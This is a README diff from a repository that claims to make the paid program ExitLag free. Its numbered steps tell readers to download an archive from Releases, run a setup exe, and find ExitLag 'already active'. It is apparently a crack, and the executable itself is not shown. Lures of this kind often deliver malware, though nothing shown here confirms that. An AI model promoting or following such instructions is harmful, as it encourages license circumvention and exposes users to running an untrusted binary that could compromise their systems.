ursamed33/Exit-Lag-Tool-Maker/README.md

-How to make free Exit Lag?

-Download archive from Release
+1.Download archive from Release

-Unzip it in folder
+2.Unzip it in folder

-Close your ExitLag
+3.Close your ExitLag

-Run setup exe
+4.Run setup exe

-Wait until all items install
+5.Wait until all items install

-Run Exitlag

-It already active!
+6.Run Exitlag.

+7.Done!